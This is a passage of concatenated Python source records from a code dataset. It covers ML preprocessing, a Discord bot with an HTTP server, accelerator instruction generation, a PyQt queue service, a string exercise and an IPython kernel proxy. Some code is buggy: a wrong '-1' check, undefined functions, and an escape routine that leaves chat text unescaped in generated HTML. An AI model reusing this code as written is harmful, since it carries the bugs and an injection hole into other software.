print(\"... making a needs maintenance target\")\n total_runtime = np.zeros(df.shape[0])\n for unit in df['unit_nr'].unique():\n unit_inds = np.where(df['unit_nr'].values == unit)[0]\n total_runtime[unit_inds] = df.iloc[unit_inds, :]['time'].max()\n df['total_runtime'] = total_runtime\n df['RUL'] = df['total_runtime'] - df['time']\n df['needs_maintenance'] = [1 if r < before_failure else 0 for r in df['RUL']]\n print(\"...... orig data shape {} x {}\".format(df.shape[0],df.shape[1]))\n\n return(df)\n\ndef munge_data(df, numeric_features, categorical_features):\n \"\"\"\n\n Deal with missing values then use specific numeric and categorical features to create a feature matrix X, and\n a target vector y.\n\n :param df:\n :param numeric_features:\n :param categorical_features:\n :return:\n \"\"\"\n\n print(\"... munging data\")\n X = df.copy()\n orig_cols = list(X.columns).copy()\n\n # drop columns with too many nans\n X.dropna(axis='columns', inplace=True, thresh=int(round(0.5*X.shape[0])))\n dropped_by_nan = list(set(orig_cols).difference(set(X.columns)))\n numeric_features = list(set(numeric_features).difference(dropped_by_nan))\n print(\"...... # columns dropped due to excessive NaNs: {}\".format(dropped_by_nan))\n\n # drop columns with very low variance\n dropped_by_variance = [f for f in numeric_features if X[f].values.var() < 0.0000001]\n X.drop(columns=dropped_by_variance, inplace=True)\n print(\"...... columns dropped based on variance: {}\".format(dropped_by_variance))\n numeric_features = list(set(numeric_features).difference(set(dropped_by_variance)))\n\n # create the feature matrix\n X = X[numeric_features + categorical_features]\n y = df['needs_maintenance'].copy()\n print(\"...... # of columns explicitly not used: {}\".format(df.shape[1] - X.shape[1]))\n print(\"...... feature matrix shape: {} x {}\".format(X.shape[0], X.shape[1]))\n return(X,y,numeric_features)\n\ndef plot_subset(df, unit_subset, features):\n \"\"\"\n Make a exploratory plot using specific units and specific features\n :param df:\n :param unit_subset:\n :param features:\n :return:\n \"\"\"\n\n subset_mask = [True if df['unit_nr'].values[i] in unit_subset else False for i in range(df.shape[0])]\n df_subset = df[subset_mask]\n\n fig, axs = plt.subplots(len(features), len(unit_subset), figsize=(16, 8), sharex=True, sharey=False)\n for f, feature in enumerate(features):\n for u, unit in enumerate(df_subset['unit_nr'].unique()):\n ax = axs[f, u]\n ax.set_facecolor('black')\n df_unit = df_subset[df_subset['unit_nr'] == unit]\n ax.plot(df_unit['time'], df_unit[feature], color=COLORS[f])\n ax.xaxis.set_major_locator(plt.MaxNLocator(3))\n\n if f == 0:\n ax.set_title(\"unit-{}\".format(unit))\n elif f == len(features)-1:\n ax.set_xlabel('Time')\n\n if u == 0:\n ax.set_ylabel(feature)\n else:\n ax.set_yticks([])\n\n ax.set_ylim((df_subset[feature].min(), df_subset[feature].max()))\n ax.set_xlim((df_subset['time'].min(), df_subset['time'].max()))\n\n plt.tight_layout()\n return(plt)\n\ndef get_preprocessor(numeric_features, categorical_features):\n \"\"\"\n return a sklearn pipeline transformer\n :param categorical_features:\n :param numeric_features:\n :return:\n \"\"\"\n\n numeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())])\n\n categorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='constant')),\n ('onehot', OneHotEncoder(handle_unknown='ignore'))])\n\n preprocessor = ColumnTransformer(transformers=[\n ('num', numeric_transformer, numeric_features),\n ('cat', categorical_transformer, categorical_features)])\n\n return(preprocessor)\n\n\nif __name__ == '__main__':\n\n # load data\n print('loading data...')\n data_dir = os.path.join(\"..\", \"data\")\n all_data = load_data(data_dir)\n df = all_data['FD_001']['df_train'].copy()\n\n # make target\n df = make_target(df, before_failure=10)\n\n # munge data\n numeric_features = ['os_1', 'os_2', 'os_3'] + ['sensor_' + str(i).zfill(2) for i in range(2, 22)]\n categorical_features = ['unit_nr']\n X, y, numeric_features = munge_data(df, numeric_features, categorical_features)\n\n # EDA\n unit_subset = df['unit_nr'].unique()[:9]\n features = ['sensor_02', 'sensor_03', 'sensor_04', 'sensor_07', 'sensor_08']\n #plt = plot_subset(df, unit_subset, features)\n #plt.show()\n\n # model training\n print(\"... model training\")\n preprocessor = get_preprocessor(numeric_features, categorical_features)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y)\n\n target_names = [\"no_maintenance\", \"yes_maintenance\"]\n print(\"...... train\", sorted(Counter(y_train).items()))\n print(\"...... test\", sorted(Counter(y_test).items()))\n print(\"...... target names\", target_names)\n\n time_start = time.time()\n pipe = Pipeline(steps=[('preprocessor', preprocessor),\n ('sgd', SGDClassifier(class_weight='balanced'))])\n #\n param_grid = {'sgd__penalty': ['l2', 'l1', 'elasticnet'],\n 'sgd__loss': ['hinge', 'log', 'modified_huber', 'squared_hinge', 'perceptron']\n }\n\n grid = GridSearchCV(pipe, param_grid=param_grid, cv=5, n_jobs=-1)\n grid.fit(X_train, y_train)\n y_pred = grid.predict(X_test)\n\n ## model results\n print(\"... model results\")\n print(\"...... train time\", time.strftime('%H:%M:%S', time.gmtime(time.time() - time_start)))\n print(\"...... best parameters: \", grid.best_params_)\n print(\"...... model score: %.3f\" % balanced_accuracy_score(y_test, y_pred))\n print('done')\n\n\n","sub_path":"notebooks/mflib.py","file_name":"mflib.py","file_ext":"py","file_size_in_byte":8164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"356784564","text":"from constants import Constants\r\nimport os\r\nimport threading\r\nimport http.server\r\nimport socketserver\r\nimport json\r\nimport traceback\r\n\r\npath = os.path.dirname(os.path.abspath(__file__))\r\nwith open(\"config.txt\") as f:\r\n\tlines = f.readlines()\r\n\tbaseurl = lines[1].strip()\r\n\tPORT = int(lines[2].strip())\r\n\r\ndef escape(msg):\r\n\tif type(msg) == str:\r\n\t\treturn msg.replace(\r\n\t\t\t\"\\\"\",\"\\\\\\\"\"\r\n\t\t).replace(\r\n\t\t\t\"\\'\",\"\\\\\\'\"\r\n\t\t).replace(\r\n\t\t\t\"`\",\"\\\\`\"\r\n\t\t).replace(\r\n\t\t\t\"<\",\"<\"\r\n\t\t).replace(\r\n\t\t\t\">\",\">\"\r\n\t\t)\r\n\treturn msg\r\n\r\ndef serverproc():\r\n\tos.chdir(os.path.join(path,\"serverfiles\"))\r\n\tHandler = http.server.SimpleHTTPRequestHandler\r\n\r\n\tdef do_POST(self):\r\n\t\tdata = self.rfile.read(int(self.headers['Content-Length']))\r\n\t\tif type(data) == bytes:\r\n\t\t\tdata = data.decode(\"utf-8\")\r\n\r\n\t\ttry:\r\n\t\t\tjsondata = json.loads(data)\r\n\r\n\t\t\tprint(\"POST\")\r\n\r\n\t\t\twith open(os.path.join(path,\"serverfiles\",\"questions.json\")) as f:\r\n\t\t\t\tcurrentjson = json.load(f)\r\n\r\n\t\t\tselected = list(filter(lambda i:i[\"selected\"], jsondata[\"messages\"]))\r\n\r\n\t\t\tif len(selected) > 0:\r\n\t\t\t\tcurrentjson.append({\r\n\t\t\t\t\t\"questions\":selected,\r\n\t\t\t\t\t\"channel\":selected[0][\"channelname\"],\r\n\t\t\t\t\t\"name\":jsondata[\"name\"],\r\n\t\t\t\t\t\"qid\":selected[0][\"qid\"]\r\n\t\t\t\t})\r\n\r\n\t\t\t\twith open(os.path.join(path,\"serverfiles\",\"questions.json\"), \"w\") as f:\r\n\t\t\t\t\tjson.dump(currentjson,f,indent=2)\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\r\n\t\t\tself.send_response(200)\r\n\t\t\tself.send_header('Content-type', 'application/json; charset=UTF-8')\r\n\t\t\tself.end_headers()\r\n\r\n\t\t\tself.wfile.write(json.dumps({\r\n\t\t\t\t\"location\":'index.html'.format(baseurl)\r\n\t\t\t}).encode(\"utf-8\"))\r\n\t\t\treturn\r\n\r\n\t\texcept Exception as e:\r\n\t\t\ttraceback.print_exc()\r\n\r\n\t\t\tself.send_response(200)\r\n\t\t\tself.send_header('Content-type', 'application/json; charset=UTF-8')\r\n\t\t\tself.end_headers()\r\n\r\n\t\t\tself.wfile.write(json.dumps({\r\n\t\t\t\t\"location\":'error.html'.format(baseurl)\r\n\t\t\t}).encode(\"utf-8\"))\r\n\r\n\t\t\treturn\r\n\r\n\r\n\tHandler.do_POST = do_POST\r\n\r\n\thttpd = socketserver.TCPServer((\"\", PORT), Handler)\r\n\tprint(\"serving at port\", PORT)\r\n\thttpd.serve_forever()\r\n\r\ndef init():\r\n\tthreading.Thread(target=serverproc,daemon=True).start()\r\n\ttry:\r\n\t\tfor i in os.listdir(os.path.join(path,\"serverfiles\",\"questions\")):\r\n\t\t\tprint(\"removing {}\".format(i))\r\n\t\t\tif os.path.isfile(os.path.join(path,\"serverfiles\",\"questions\",i)):\r\n\t\t\t\tos.remove(os.path.join(path,\"serverfiles\",\"questions\",i))\r\n\texcept FileNotFoundError:\r\n\t\tos.mkdir(os.path.join(path,\"serverfiles\",\"questions\"))\r\n\r\n\r\nasync def onmessage(message):\r\n\r\n\tcontent = message.content.lower()\r\n\r\n\tif content.startswith(\".question\"):\r\n\t\t\twith open(os.path.join(path,\"serverfiles\",\"template.html\")) as f:\r\n\t\t\t\ttemplate = f.read()\r\n\r\n\t\t\tquestionnumber = Constants.questioncounter\r\n\t\t\tConstants.questioncounter += 1\r\n\r\n\t\t\tif message.channel.id in Constants.last50msgs:\r\n\t\t\t\tnewfile = template.replace(\r\n\t\t\t\t\t\"XXXXXXXXXXXXXXXXXXXXX\",\r\n\t\t\t\t\t\",\".join((\r\n\t\t\t\t\t\t\t\"{\" + \"content:\\\"{}\\\",id:\\\"{}\\\",author:\\\"{}\\\",authorid:\\\"{}\\\",channelname:\\\"{}\\\",channelid:\\\"{}\\\",selected:false,qid:\\\"{}\\\"\".format(\r\n\t\t\t\t\t\t\t\tescape(i.content),\r\n\t\t\t\t\t\t\t\tescape(i.id),\r\n\t\t\t\t\t\t\t\tescape(i.author.name),\r\n\t\t\t\t\t\t\t\tescape(i.author.id),\r\n\t\t\t\t\t\t\t\tescape(message.channel.name),\r\n\t\t\t\t\t\t\t\tescape(message.channel.id),\r\n\t\t\t\t\t\t\t\tescape(questionnumber),\r\n\t\t\t\t\t\t\t) + \"}\"\r\n\t\t\t\t\t\t\tfor i in Constants.last50msgs[message.channel.id]\r\n\t\t\t\t\t\t))\r\n\t\t\t\t)\r\n\t\t\telse:\r\n\t\t\t\tnewfile = template.replace(\r\n\t\t\t\t\t\"XXXXXXXXXXXXXXXXXXXXX\",\"\"\r\n\t\t\t\t)\r\n\r\n\r\n\t\t\twith open(\r\n\t\t\t\tos.path.join(\r\n\t\t\t\t\tpath,\r\n\t\t\t\t\t\"serverfiles\",\r\n\t\t\t\t\t\"questions\",\r\n\t\t\t\t\t\"q\" + str(questionnumber) + \".html\"\r\n\t\t\t\t), \"w\") as f:\r\n\t\t\t\tf.write(newfile)\r\n\r\n\t\r\n\t\t\tawait Constants.client.send_message(\r\n\t\t\t\tmessage.channel,\r\n\t\t\t\t\"http://{}/questions/q{}.html\".format(\r\n\t\t\t\t\tbaseurl,\r\n\t\t\t\t\tstr(questionnumber)\r\n\t\t\t\t) + \"\\nhttp://{}/questions/q{}.html\".format(\r\n\t\t\t\t\t\"192.168.2.12:8800\",\r\n\t\t\t\t\tstr(questionnumber)\r\n\t\t\t\t)\r\n\t\t\t)\r\n\r\n\tif message.channel.id in Constants.last50msgs:\r\n\t\tConstants.last50msgs[message.channel.id].append(message)\r\n\t\twhile len(Constants.last50msgs[message.channel.id]) > 50:\r\n\t\t\tConstants.last50msgs[message.channel.id].pop(0)\r\n\telse:\r\n\t\tConstants.last50msgs[message.channel.id] = [message]\r\n","sub_path":"questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"126225583","text":"## TESTING BACKPROP ON 3-LAYERED MLP\nimport sys\nimport os\nimport numpy as np\n\nroot_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, root_dir)\n\nfrom src.data_convert import *\nfrom src.instrn_proto import *\nfrom src.tile_instrn_proto import *\nimport include.config as cfg\n\npath = 'testasm/mlp_train_2layer_digital/' #path for weights, instruction and input for tile0\nnet = 'mlp_train_2layer_digital'\nwt_path =path + 'weights/'\ndatamem_off = cfg.datamem_off # each matrix has 6 memory spaces (1 for f/b, 2 for d)\nphy2log_ratio = cfg.phy2log_ratio # ratio of physical to logical xbar\ninst_refresh = 1\n\n\n## CREATE MEMRISTOR PROGRAMMING MATRICES\n# NOTE: weights programmed to xbars are stored in terms of their representative floating values\nxbar_size = cfg.xbar_size\nfor m in range(cfg.num_matrix):\n ## Create xbar weight files for programming for each matrix\n # scaling down weight values to ensure that output of MVM doesn't overflow\n log_xbar = 0.1*np.random.rand(xbar_size, xbar_size)\n phy_xbar = [np.random.rand(xbar_size, xbar_size) for i in range(phy2log_ratio)]\n xbar_size = cfg.xbar_size\n for i in range (xbar_size):\n for j in range (xbar_size):\n temp_val = float2fixed(log_xbar[i][j], cfg.int_bits, cfg.frac_bits)\n assert (len(temp_val) == 16)\n for k in range (len(phy_xbar)):\n if (k==0):\n val = temp_val[-(k+1)*cfg.xbar_bits:]\n else:\n val = temp_val[-(k+1)*cfg.xbar_bits:-(k+1)*cfg.xbar_bits+2]\n # augment sign extension (used in MSB xbar only)\n if (k == (len(phy_xbar)-1)):\n val = (cfg.num_bits - cfg.xbar_bits)*val[0] + val[0:]\n phy_xbar[k][i][j] = fixed2float(val, cfg.int_bits, cfg.frac_bits)\n\n # save log_xbar and phy_xbar to disc\n np.save (wt_path+'tile'+str(1)+'/core'+str(0)+'/mat'+str(m)+'-log_xbar', log_xbar)\n for i in range (len(phy_xbar)):\n np.save (wt_path+'tile'+str(1)+'/core'+str(0)+'/mat'+str(m)+'-phy_xbar'+str(i), phy_xbar[i])\n\n\n## CREATE INSTRUCTIONS FOR PROGRAMMMING PUMA\n# Create Tile0 instructions\ndict_list = []\n# Send input layer data to Tile1\ni_temp = i_send(mem_addr=0, vtile_id=0, send_width=16, target_addr=1, vec=8)\ndict_list.append(i_temp.copy())\n\n# Add a halt instruction\ni_temp = i_halt()\ndict_list.append (i_temp.copy())\n\nfilename = path+'/tile0/tile_imem.npy'\nnp.save(filename, dict_list)\nprint ('Total no. of instructions: ', len(dict_list))\n\n# Create Tile0-IMA0 instructions\ndict_list = []\n# Add a halt instruction\ni_temp = i_hlt()\ndict_list.append (i_temp.copy())\n\nfilename = path+'/tile0/core_imem0.npy'\nnp.save(filename, dict_list)\nprint ('Total no. of instructions: ', len(dict_list))\n\n# Create Tile1 instructions\ndict_list = []\n# Receive input layer data from Tile0\ni_temp = i_receive(mem_addr=0, vtile_id=0, receive_width=16, counter=1, vec=8)\ndict_list.append(i_temp.copy())\n\n# Add a halt instruction\ni_temp = i_halt()\ndict_list.append (i_temp.copy())\n\nfilename = path+'/tile1/tile_imem.npy'\nnp.save(filename, dict_list)\nprint ('Total no. of instructions: ', len(dict_list))\n\n# Create Tile1-IMA0 instructions\n# instructions for IMA1\ndict_list = []\n# Set load address (load indirect: tileMemory 0-127 holds input data)\ni_temp = i_set(d1=datamem_off+0, imm=0, vec=1)\ndict_list.append(i_temp.copy())\n\n# Set store address (store indirect: tileMemory 128-255 holds input data)\ni_temp = i_set(d1=datamem_off+1, imm=cfg.xbar_size, vec=1)\ndict_list.append(i_temp.copy())\n\n# Load data from tile memory to mat0-f-inMem (Matrix0: f-xbar: xbar_inMem)\ni_temp = i_load (0, datamem_off+0, load_width=16, vec=cfg.xbar_size/16)\ndict_list.append (i_temp.copy())\n\n# MVM instruction to foward pass for layer 0 (MVMU0)\ni_temp = i_mvm(['100', '000'])\ndict_list.append (i_temp.copy())\n\n# Copy output of layer0-fw pass to enable layer1-fw-pass (from mat0-f-outMem to mat1-f-inMem)\ni_temp = i_copy (6*cfg.xbar_size, cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# MVM instruction to foward pass for layer 1 (MVMU1)\ni_temp = i_mvm(['000', '100'])\ndict_list.append (i_temp.copy())\n\n# Copy output of layer1-fw-pass to enable layer1-bw-pass (from mat1-f-outMem to mat1-b-inMem)\ni_temp = i_copy (8*cfg.xbar_size, 7*cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# Copy output of layer1-fw-pass to enable layer1-acc (from mat1-f-outMem to mat1-d-outMem)\ni_temp = i_copy (11*cfg.xbar_size, 7*cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# Copy output of layer0-fw pass to enable layer2-acc (from mat0-f-outMem to mat1-d-inMem)\ni_temp = i_copy (10*cfg.xbar_size, cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# MVM instruction to backward pass for layer 1 and acc for layer 1 (MVMU1)\ni_temp = i_mvm(['000', '011'])\ndict_list.append (i_temp.copy())\n\n# Copy output of layer1-bw-pass to enable layer0-acc (from mat1-b-outMem to mat0-d-outMem)\ni_temp = i_copy (5*cfg.xbar_size, 9*cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# Copy output of layer0-fw pass to enable layer2-acc (from mat0-f-outMem to mat0-d-inMem)\ni_temp = i_copy (4*cfg.xbar_size, cfg.xbar_size, cfg.xbar_size)\ndict_list.append (i_temp.copy())\n\n# MVM instruction to acc for layer 0 (MVMU0)\ni_temp = i_mvm(['001', '000'])\ndict_list.append (i_temp.copy())\n\n# CRS instruction to populate populate xbar values in f/b-xbar from d-xbar for MVMU 0&1\n# here crs emulates the digital outer product (1 xbar read from f/b xbar, 2 xbar writes to f anf b xbars)\ni_temp = i_crs(['1', '1'])\ndict_list.append (i_temp.copy())\n\n## Store output of layer 1 to tile memory\n#i_temp = i_store(d1=datamem_off+1, r1=7*cfg.xbar_size, counter=1, store_width=16, vec=cfg.xbar_size/16)\n#dict_list.append(i_temp.copy())\n\n# Add a halt instruction\ni_temp = i_hlt()\ndict_list.append (i_temp.copy())\n\nfilename = path+'/tile1/core_imem0.npy'\nnp.save(filename, dict_list)\nprint ('Total no. of instructions: ', len(dict_list))\n\n\n## VALIDATE WITH SOFTWARE OUTPUT (compare new weight after back-prop)\n\n\n","sub_path":"test/val/old/mlp_train_2layer_digital.py","file_name":"mlp_train_2layer_digital.py","file_ext":"py","file_size_in_byte":6081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"36933802","text":"from PyQt5.QtCore import QTimer, QObject, pyqtSignal\n\nfrom Classes.Measurement import Measurement\n\nclass QueueService(QObject):\n\n #Signals\n addMeasurementToList = pyqtSignal(Measurement)\n clearList = pyqtSignal()\n\n def __init__(self, messengerService, measurementService, optionService):\n \"\"\"\n Service that handles the queues of measurements: schuedules, starts, deletes, resets them\n\n :param messengerService:\n :param measurementService:\n \"\"\"\n QObject.__init__(self)\n\n self.uiMessenger = messengerService\n self.measurementService = measurementService\n self.optionService = optionService\n\n\n self.queueFolder = ''\n\n self.queuedMeasurements = []\n\n self.wireSignals()\n\n def wireSignals(self):\n \"\"\"\n\n \"\"\"\n pass\n\n\n def queueMeasurement(self, procedure, parameters):\n \"\"\"\n\n :param procedure:\n :param parameters:\n \"\"\"\n measurement = Measurement(procedure, parameters, measurementService=self.measurementService, tempSave=self.optionService.getTempSave())\n\n if len(self.queuedMeasurements) > 0:\n self.queuedMeasurements[-1].setNext(measurement)\n\n self.queuedMeasurements.append(measurement)\n\n self.addMeasurementToList.emit(measurement)\n\n\n def clearQueue(self):\n \"\"\"\n\n \"\"\"\n print('clear queued trigged')\n self.queuedMeasurements = []\n self.uiMessenger.clearQueue.emit()\n self.uiMessenger.updateVariableStatusBar.emit('Queue Cleared')\n\n\n self.clearList.emit()\n\n def resetQueue(self):\n \"\"\"\n\n \"\"\"\n newMeasurements = []\n\n for measurement in self.queuedMeasurements:\n newMeasurement = Measurement(measurement.procedure, measurement.parameters, measurementService=measurement.measurementService, tempSave=self.optionService.getTempSave())\n newMeasurements.append(newMeasurement)\n\n for i, measurement in enumerate(newMeasurements):\n if not i == len(newMeasurements)-1:\n measurement.setNext(newMeasurements[i+1])\n\n self.queuedMeasurements = newMeasurements\n self.clearList.emit()\n\n for measurement in self.queuedMeasurements:\n self.addMeasurementToList.emit(measurement)\n\n\n def processQueue(self, queueFolder):\n \"\"\"\n\n :param queueFolder:\n \"\"\"\n print('process queue triggered')\n self.queueFolder = queueFolder\n self.currentMeasurementID = 0\n\n alreadyFinished = False\n\n for measurement in self.queuedMeasurements:\n if measurement.finished == True:\n alreadyFinished = True\n\n\n if alreadyFinished == True:\n self.resetQueue()\n self.uiMessenger.updateVariableStatusBar.emit('Processing Queue')\n self.measurementService.startQueueMeasurement(self.queuedMeasurements[0], self.queueFolder)\n # self.measurementService.measurementFinish.connect(self.processFurther)\n else:\n if len(self.queuedMeasurements) > 0:\n self.uiMessenger.updateVariableStatusBar.emit('Processing Queue')\n self.measurementService.startQueueMeasurement(self.queuedMeasurements[0], self.queueFolder)\n # self.measurementService.measurementFinish.connect(self.processFurther)\n else:\n self.uiMessenger.updateVariableStatusBar.emit('Queue is empty')\n\n\n # def processFurther(self):\n # self.currentMeasurementID = self.currentMeasurementID + 1\n # if self.currentMeasurementID < len(self.queuedMeasurements):\n # self.measurementService.startQueueMeasurement(self.queuedMeasurements[self.currentMeasurementID], self.queueFolder)\n # else:\n # self.messengerService.updateVariableStatusBar.emit('Queue finished')\n # self.measurementService.measurementFinish.disconnect(self.processFurther)","sub_path":"Services/QueueService.py","file_name":"QueueService.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"619939049","text":"# Python program to print the first non-repeating character\nNO_OF_CHARS = 256\n \n# Fills count array with frequency of characters\ndef fillCharCounts(string, count):\n for i in string:\n count[ord(i)] += 1\n return count\n \n# The function returns index of first non-repeating\n# character in a string. If all characters are repeating\n# then returns -1\ndef firstNonRepeating(string):\n count = [0] * NO_OF_CHARS\n count = fillCharCounts(string, count)\n index = -1\n k = 0\n \n for i in string:\n if count[ord(i)] == 1:\n index = k\n break\n k += 1\n \n return index\n \n# Driver program to test above function\nstring = input(\"Enter the string : \")\nindex = firstNonRepeating(string)\nif index==1:\n print (\"Either all characters are repeating or string is empty\")\nelse:\n print (\"First non-repeating character is \", string[index])\n","sub_path":"String/3_find_first_non_repeating_character_from_string.py","file_name":"3_find_first_non_repeating_character_from_string.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"281122092","text":"#! /usr/bin/env python3\n\nimport sys\nimport os.path\nimport shutil\nimport subprocess\nimport threading\n\nimport json\nimport zmq\n\n### Communications ###\n\ndef encode_dict(d):\n return bytes(json.dumps(d), \"utf-8\")\n\ndef wire_serialize(header, content, parent_header=None, metadata=None, identities=None):\n msg_parts = []\n if identities:\n msg_parts.extend(identities)\n msg_parts.append(b'')\n msg_parts.append(encode_dict(header))\n msg_parts.append(encode_dict(parent_header) if parent_header else b'{}')\n msg_parts.append(encode_dict(metadata) if metadata else b'{}')\n msg_parts.append(encode_dict(content))\n\n return msg_parts\n\ndef message_send(socket, msg_parts):\n socket.send_multipart(msg_parts)\n\ndef message_recv(socket):\n return socket.recv_multipart()\n\ndef wire_deserialize(msg_parts):\n identities = []\n\n index = 0\n while msg_parts[index] != b'':\n identities.append(msg_parts[index])\n index += 1\n\n # delimiter found\n index += 1\n signature = msg_parts[index]\n header = msg_parts[index+1]\n parent_header = msg_parts[index+2]\n metadata = msg_parts[index+3]\n content = msg_parts[index+4]\n\n return (identities, signature, header, parent_header, metadata, content)\n\ndef gen_endpoint(transport, ip, port=None):\n return \"{}://{}\".format(transport, ip) + (\":{}\".format(port) if port else \"\")\n\nclass ZMQAgent:\n def __init__(self, config, kernel):\n self.config = config\n self.kernel = kernel\n self.ctx = zmq.Context.instance()\n\n self.shell = self.ctx.socket(zmq.ROUTER)\n self.iopub = self.ctx.socket(zmq.PUB)\n\n def bind(self):\n config = self.config # XXX: shortcut\n\n if 'shell-port' in config:\n self.shell.bind(gen_endpoint(config['transport'], config['ip'], config['shell-port']))\n else:\n config['shell-port'] = self.shell.bind_to_random_port(gen_endpoint(config['transport'], config['ip']))\n\n if 'iopub-port' in config:\n self.iopub.bind(gen_endpoint(config['transport'], config['ip'], config['iopub-port']))\n else:\n config['iopub-port'] = self.iopub.bind_to_random_port(gen_endpoint(config['transport'], config['ip']))\n\n def start_heartbeat(self):\n config = self.config\n heartbeat = self.ctx.socket(zmq.REP)\n \n def heartbeat_loop():\n while self.heartbeat_running:\n msg = heartbeat.recv()\n heartbeat.send(msg)\n\n heartbeat.close()\n\n # install the heartbeat thread\n if 'hb-port' in config:\n heartbeat.bind(gen_endpoint(config['transport'], config['ip'], config['hb-port']))\n else:\n config['hb-port'] = heartbeat.bind_to_random_port(gen_endpoint(config['transport'], config['ip']))\n\n self.heartbeat_running = True\n hb_thread = threading.Thread(target=heartbeat_loop, name=\"heartbeat\", daemon=True)\n hb_thread.start()\n\n # main thread does not wait of course\n\n def main_loop(self):\n raise Error(\"Not implemented\")\n\n### Command line and configuration ###\n\nclass CmdLineError(Exception):\n pass\n\ndef duplicate_cmdline_opt(opt):\n return \"Option `{}` already specified, please stop babbling ;-).\".format(opt)\n\ndef unexpected_cmdline_opt(opt):\n return \"Don't know what to do with option `{}` on the command line, sorry.\".format(opt)\n\ndef parse_command_line(args):\n config = { 'proxy_script_path': os.path.abspath(args[0]) }\n #print(\"proxy script path = {}\".format(config['proxy_script_path']))\n config['transport'] = \"tcp\" # default transport = tcp\n config['ip'] = \"127.0.0.1\" # default ip is loopback\n\n opts = ['--kernel-program', '--kernel-options', '--profile-dir', '--profile-name', '--ipython-program', '--ipython-options', '--shell-port']\n\n for arg in args[1:]:\n arg_consumed = False\n for opt in opts:\n if arg.startswith(opt + '='):\n if opt[2:] in config:\n raise CmdLineError(duplicate_cmdline_opt(opt))\n else:\n config[opt[2:]] = arg[len(opt)+1:]\n arg_consumed = True\n break\n if not arg_consumed:\n raise CmdLineError(unexpected_cmdline_opt(arg))\n\n return config\n\nclass ConfigError(Exception):\n pass\n\ndef check_ipython_version(config, req_ipython_version_major, min_ipython_version_minor):\n try:\n ipython_version_string = subprocess.check_output([config['ipython-program'], \"--version\"]).decode()\n except FileNotFoundError:\n raise ConfigError(\"IPython program `{}` cannot be found despite all our efforts, sorry.\".format(config['ipython-program']))\n except subprocess.CalledProcessError as e:\n raise ConfigError(\"IPython program complains: {}\".format(e))\n\n config['ipython-version-string'] = ipython_version_string[:-1] if ipython_version_string.endswith('\\n') else ipython_version_string\n\n ipython_version = tuple([int(d) for d in ipython_version_string.split(\".\")])\n #print(\"ipython version = {}\".format(ipython_version))\n if (ipython_version[0] != req_ipython_version_major) or (ipython_version[1] < min_ipython_version_minor):\n raise ConfigError(\"Required IPython version is v{}.x.y (x >= {}), version found=v{}\".format(req_ipython_version_major, \n min_ipython_version_minor,\n ipython_version_string))\n \ndef check_configuration(config, req_ipython_version_major, min_ipython_version_minor):\n if 'kernel-program' not in config:\n raise ConfigError(\"Kernel program must be specifed, this is a proxy for something !\")\n \n if 'ipython-program' not in config:\n config['ipython-program'] = \"ipython\" # default name\n\n check_ipython_version(config, req_ipython_version_major, min_ipython_version_minor)\n\n \n ipython_program_path = shutil.which(config['ipython-program'])\n if not ipython_program_path:\n raise ConfigError(\"IPython program `{}` cannot be found despite all our efforts, sorry.\".format(config['ipython-program']))\n else:\n config['ipython-program-path'] = ipython_program_path\n\n if 'shell-port' in config:\n config['shell-port'] = int(config['shell-port'])\n \n\n### Main program ###\n\ndef halt(message, error_code=1):\n print(message, file=sys.stderr)\n print(\"Bye bye !\", file=sys.stderr)\n sys.exit(error_code)\n\nif __name__ == \"__main__\":\n\n # 1. Configuration\n\n try:\n config = parse_command_line(sys.argv)\n check_configuration(config, req_ipython_version_major=2, min_ipython_version_minor=0)\n except CmdLineError as err:\n halt(\"\"\"Command line error\n => {}\"\"\".format(err))\n except ConfigError as err:\n halt(\"\"\"Configuration error\n => {}\"\"\".format(err))\n\n # 2. Spawn and control kernel program\n kernel = KernelProcess(config)\n kernel.spawn()\n\n # 3. Creation of ZMQ agent\n agent = ZMQAgent(config, kernel)\n \n agent.bind()\n agent.start_heartbeat()\n\n print(\"config = {}\".format(config))\n\n # 4. Spawn the Ipython frontend\n spawn_ipython_frontend(config)\n\n # 5. Enter main loop\n agent.main_loop()\n\n\n","sub_path":"ipython-kernel-proxy.py","file_name":"ipython-kernel-proxy.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"63290939","text":"from ._version import get_versions\n__version__ = get_versions()['version']\ndel get_versions\n\n__doc__ = \"\"\"\n epics channel access python module\n\n version: %s\n Principal Authors:\n Matthew Newville CARS, University of Chicago\n Angus Gratton , Australian National University\n\n== License:\n\n Except where explicitly noted, this file and all files in this\n distribution are licensed under the Epics Open License See license.txt in\n the top-level directory of this distribution.\n\n== Overview:\n Python Interface to the Epics Channel Access\n protocol of the Epics control system.\n\n\"\"\" % (__version__)\n\n\nimport time\nimport sys\nimport threading\nfrom . import ca\nfrom . import dbr\nfrom . import pv\nfrom . import alarm\nfrom . import device\nfrom . import motor\nfrom . import multiproc\n\nPV = pv.PV\nAlarm = alarm.Alarm\nMotor = motor.Motor\nDevice = device.Device\npoll = ca.poll\n\nget_pv = pv.get_pv\n\nCAProcess = multiproc.CAProcess\nCAPool = multiproc.CAPool\n\n# some constants\nNO_ALARM = 0\nMINOR_ALARM = 